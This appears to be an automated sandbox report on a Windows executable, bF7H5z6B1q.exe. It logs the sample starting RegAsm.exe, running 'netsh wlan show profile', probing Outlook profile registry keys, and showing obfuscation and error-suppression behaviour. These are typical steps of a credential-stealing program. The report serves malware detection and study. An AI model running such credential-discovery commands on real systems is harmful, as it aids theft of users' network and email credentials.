Source: unknown	Process created: C:\Users\user\Desktop\bF7H5z6B1q.exe 'C:\Users\user\Desktop\bF7H5z6B1q.exe'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\bF7H5z6B1q.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\bF7H5z6B1q.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\bF7H5z6B1q.exe'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile	Jump to behavior

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32

Jump to behavior

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Checks if Microsoft Office is installed

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Uses new MSVCR Dlls

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9554_none_d08d6fa2442aa556\MSVCR80.dll

Jump to behavior

Binary contains paths to debug symbols

Show sources

Source:

Binary string: mscorrc.pdb source: RegAsm.exe, 0000000A.00000002.16917699549.0000000022D40000.00000002.00000001.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Show sources

Source: C:\Users\user\Desktop\bF7H5z6B1q.exe	Code function: 3_2_004085E3 push es; ret	3_2_004085E2
Source: C:\Users\user\Desktop\bF7H5z6B1q.exe	Code function: 3_2_00408595 push es; ret	3_2_004085E2
Source: C:\Users\user\Desktop\bF7H5z6B1q.exe	Code function: 3_2_0040859B push es; ret	3_2_004085E2
Source: C:\Users\user\Desktop\bF7H5z6B1q.exe	Code function: 3_2_02BA5724 push ds; iretd	3_2_02BA5728
Source: C:\Users\user\Desktop\bF7H5z6B1q.exe	Code function: 3_2_02BA5888 push FFFFFFB8h; iretd	3_2_02BA58CC
Source: C:\Users\user\Desktop\bF7H5z6B1q.exe	Code function: 3_2_02BA3C18 push eax; retf	3_2_02BA3C1A
Source: C:\Users\user\Desktop\bF7H5z6B1q.exe	Code function: 3_2_02BA4557 push edx; ret	3_2_02BA455B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_011295ED push edi; ret	10_2_011295EE
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_01129614 push ebx; retf	10_2_0112961E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CF4ED2 push eax; iretd	10_2_22CF4ED3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CF9C58 push eax; ret	10_2_22CF9C91
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CF598F push esp; iretd	10_2_22CF5992
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CF598B push esi; iretd	10_2_22CF598E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CF5983 push esp; iretd	10_2_22CF598A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CF599F push edx; iretd	10_2_22CF59A6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CF599B push edi; iretd	10_2_22CF599E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CF5993 push edi; iretd	10_2_22CF599A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CF59A7 push ebp; iretd	10_2_22CF59AA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CF59B3 push ebp; iretd	10_2_22CF59B6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CF594B push edx; iretd	10_2_22CF594E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CF595F push ebx; iretd	10_2_22CF5966
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CF5953 push esi; iretd	10_2_22CF595A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CF596F push esp; iretd	10_2_22CF5976
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CF5967 push ebp; iretd	10_2_22CF596E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CF1509 push ecx; retf	10_2_22CF151C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CF593F push esi; iretd	10_2_22CF5946
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CF5933 push esp; iretd	10_2_22CF593A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CF5930 push edi; iretd	10_2_22CF5932
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22DE4A8A pushad ; ret	10_2_22DE4A8B

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Users\user\Desktop\bF7H5z6B1q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
